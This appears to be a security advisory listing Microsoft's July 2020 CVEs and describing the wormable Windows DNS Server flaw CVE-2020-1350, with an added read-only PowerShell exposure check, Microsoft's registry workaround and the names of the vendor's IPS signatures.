CVE-2020-1384 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
CVE-2020-1385 Windows Credential Picker Elevation of Privilege Vulnerability
CVE-2020-1386 Connected User Experiences and Telemetry Service Information Disclosure Vulnerability
CVE-2020-1387 Windows Push Notification Service Elevation of Privilege Vulnerability
CVE-2020-1388 Windows Elevation of Privilege Vulnerability
CVE-2020-1389 Windows Kernel Information Disclosure Vulnerability
CVE-2020-1390 Windows Network Connections Service Elevation of Privilege Vulnerability
CVE-2020-1391 Windows Agent Activation Runtime Information Disclosure Vulnerability
CVE-2020-1392 Windows Elevation of Privilege Vulnerability
CVE-2020-1393 Windows Diagnostics Hub Elevation of Privilege Vulnerability
CVE-2020-1394 Windows Elevation of Privilege Vulnerability
CVE-2020-1395 Windows Elevation of Privilege Vulnerability
CVE-2020-1396 Windows ALPC Elevation of Privilege Vulnerability
CVE-2020-1397 Windows Imaging Component Information Disclosure Vulnerability
CVE-2020-1398 Windows Lockscreen Elevation of Privilege Vulnerability
CVE-2020-1400 Jet Database Engine Remote Code Execution Vulnerability
CVE-2020-1401 Jet Database Engine Remote Code Execution Vulnerability
CVE-2020-1402 Windows ActiveX Installer Service Elevation of Privilege Vulnerability
CVE-2020-1404 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1405 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability
CVE-2020-1406 Windows Network List Service Elevation of Privilege Vulnerability
CVE-2020-1407 Jet Database Engine Remote Code Execution Vulnerability
CVE-2020-1408 Microsoft Graphics Remote Code Execution Vulnerability
CVE-2020-1409 DirectWrite Remote Code Execution Vulnerability
CVE-2020-1411 Windows Kernel Elevation of Privilege Vulnerability
CVE-2020-1412 Microsoft Graphics Components Remote Code Execution Vulnerability
CVE-2020-1413 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1414 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1415 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1416 Visual Studio and Visual Studio Code Elevation of Privilege Vulnerability
CVE-2020-1418 Windows Diagnostics Hub Elevation of Privilege Vulnerability
CVE-2020-1419 Windows Kernel Information Disclosure Vulnerability
CVE-2020-1420 Windows Error Reporting Information Disclosure Vulnerability
CVE-2020-1421 LNK Remote Code Execution Vulnerability
CVE-2020-1422 Windows Runtime Elevation of Privilege Vulnerability
CVE-2020-1423 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1424 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1427 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1428 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1429 Windows Error Reporting Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1430 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1431 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1432 Skype for Business via Internet Explorer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1433 Microsoft Edge PDF Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1434 Windows Sync Host Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1435 GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1436 Windows Font Library Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1437 Windows Network Location Awareness Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1438 Windows Network Connections Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1439 PerformancePoint Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1442 Office Web Apps XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1443 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1444 Microsoft SharePoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1445 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1446 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1447 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1448 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1449 Microsoft Project Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1450 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1451 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1454 Microsoft SharePoint Reflective XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1456 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2020-1458 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-1461 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1462 Skype for Business via Microsoft Edge (EdgeHTML-based) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1463 Windows SharedStream Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1465 Microsoft OneDrive Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-1468 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-1469 Bond Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-1481 Visual Studio Code ESLint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.

Windows DNS Server Remote Code Execution Vulnerability CVE-2020-1350

A remote code execution vulnerability exists in the Windows Domain Name System (DNS) Server role when certain requests are not handled properly. An attacker who successfully exploits it can run arbitrary code in the context of the Local System account, which amounts to full control of the server; because the DNS Server role is commonly installed on Active Directory domain controllers, that can also mean control of the domain. Any Windows Server configured as a DNS server is at risk.

To exploit the vulnerability, an unauthenticated attacker could send malicious requests to a Windows DNS server. No credentials and no user interaction are required.

CVE-2020-1350 is classified as a ‘wormable’ vulnerability and carries the maximum CVSS v3 base score of 10.0. A wormable vulnerability is one that malware can use to spread from one vulnerable computer to the next without any user interaction.

This issue affects the Windows Server versions listed below. Windows client editions do not ship the DNS Server role and are not affected; non-Microsoft DNS servers are not affected either.

  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2019
  • Microsoft Windows Server version 1803 (Server Core installation)
  • Microsoft Windows Server version 1903 (Server Core installation)
  • Microsoft Windows Server version 1909 (Server Core installation)
  • Microsoft Windows Server version 2004 (Server Core installation)

Microsoft patched this vulnerability in its July 2020 Patch Tuesday updates, released July 14, 2020. Administrators are urged to apply the update to every Windows DNS server as soon as possible. Where that is not immediately feasible, Microsoft also published a registry-based workaround that caps the size of inbound TCP DNS packets; it takes effect only after the DNS Server service is restarted and is not a substitute for the update.
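The following PowerShell script is an added example, not code from SonicWall or Microsoft. It performs the exposure check a practitioner would want for CVE-2020-1350 on a single host: it confirms whether the DNS Server role is present, reports the OS build and dns.exe file version for comparison with Microsoft's KB table, lists updates installed since the July 2020 Patch Tuesday, and checks (optionally applies) Microsoft's published workaround. The registry path HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, the value name TcpReceivePacketSize and the value 0xFF00 are taken from Microsoft's workaround guidance (KB4569509); the date 2020-07-14 is the July 2020 Patch Tuesday release date. The date-based hotfix filter is only a heuristic and must be cross-checked against the KB number for the host's OS; it cannot prove the fix is installed.

```powershell
<#
  Added example (not SonicWall's or Microsoft's code): CVE-2020-1350 exposure
  check for one Windows Server host. Run in an elevated PowerShell session.
  Assumptions: registry path/value and 0xFF00 come from Microsoft's workaround
  guidance (KB4569509); 2020-07-14 is the July 2020 Patch Tuesday date.
#>
param(
    [switch]$ApplyWorkaround   # also set the TcpReceivePacketSize workaround and restart DNS
)

$dnsParams    = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$patchTuesday = Get-Date '2020-07-14'

# 1. Is this host even a DNS server? Client SKUs and servers without the role are not exposed.
$dnsSvc = Get-Service -Name DNS -ErrorAction SilentlyContinue
if (-not $dnsSvc) {
    Write-Output 'DNS Server service not present: host is not affected by CVE-2020-1350.'
    return
}
Write-Output ("DNS Server service found (status: {0})." -f $dnsSvc.Status)

# 2. OS build and dns.exe version, to compare against Microsoft's KB table for this SKU.
$os = Get-CimInstance -ClassName Win32_OperatingSystem
Write-Output ("OS: {0} build {1}" -f $os.Caption, $os.BuildNumber)
$dnsExe = Join-Path $env:SystemRoot 'System32\dns.exe'
if (Test-Path $dnsExe) {
    Write-Output ("dns.exe file version: {0}" -f (Get-Item $dnsExe).VersionInfo.FileVersion)
}

# 3. Any update installed on or after July 2020 Patch Tuesday? Date-only heuristic:
#    the listed KB must still be checked against Microsoft's table for this OS.
$recent = Get-HotFix |
          Where-Object { $_.InstalledOn -and $_.InstalledOn -ge $patchTuesday } |
          Sort-Object InstalledOn -Descending
if ($recent) {
    Write-Output 'Updates installed since 2020-07-14 (verify the CVE-2020-1350 KB is among them):'
    $recent | ForEach-Object {
        Write-Output ("  {0}  {1}  {2:yyyy-MM-dd}" -f $_.HotFixID, $_.Description, $_.InstalledOn)
    }
} else {
    Write-Warning 'No update installed since 2020-07-14: treat this host as UNPATCHED.'
}

# 4. Is Microsoft's registry workaround in place? Any value at or below 0xFF00 counts.
$val = Get-ItemProperty -Path $dnsParams -Name TcpReceivePacketSize -ErrorAction SilentlyContinue
if ($val -and $val.TcpReceivePacketSize -le 0xFF00) {
    Write-Output ("Workaround present: TcpReceivePacketSize = 0x{0:X}" -f $val.TcpReceivePacketSize)
} else {
    Write-Warning 'Workaround NOT applied (TcpReceivePacketSize missing or above 0xFF00).'
    if ($ApplyWorkaround) {
        # Cap inbound TCP DNS packets at 0xFF00 bytes per Microsoft's guidance;
        # the DNS Server service must be restarted for the change to take effect.
        New-ItemProperty -Path $dnsParams -Name TcpReceivePacketSize `
                         -PropertyType DWord -Value 0xFF00 -Force | Out-Null
        Restart-Service -Name DNS -Force
        Write-Output 'Workaround applied and DNS service restarted. Still install the July 2020 update.'
    }
}
```

Run it without parameters first to get a read-only report; add `-ApplyWorkaround` only on servers that cannot take the update yet, during a window where a brief DNS service restart is acceptable. Remove the registry value after the update is installed, since the cap also blocks legitimate large TCP responses.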

SonicWall Capture Labs provides protection against this threat via the following signatures:

      • IPS 15069: Windows DNS Server Remote Code Execution (CVE-2020-1350) 1
      • IPS 15073: Windows DNS Server Remote Code Execution (CVE-2020-1350) 2
      • IPS 15074: Windows DNS Server Remote Code Execution (CVE-2020-1350) 3
      • IPS 15075: Windows DNS Server Remote Code Execution (CVE-2020-1350) 4
      • IPS 15076: Windows DNS Server Remote Code Execution (CVE-2020-1350) 5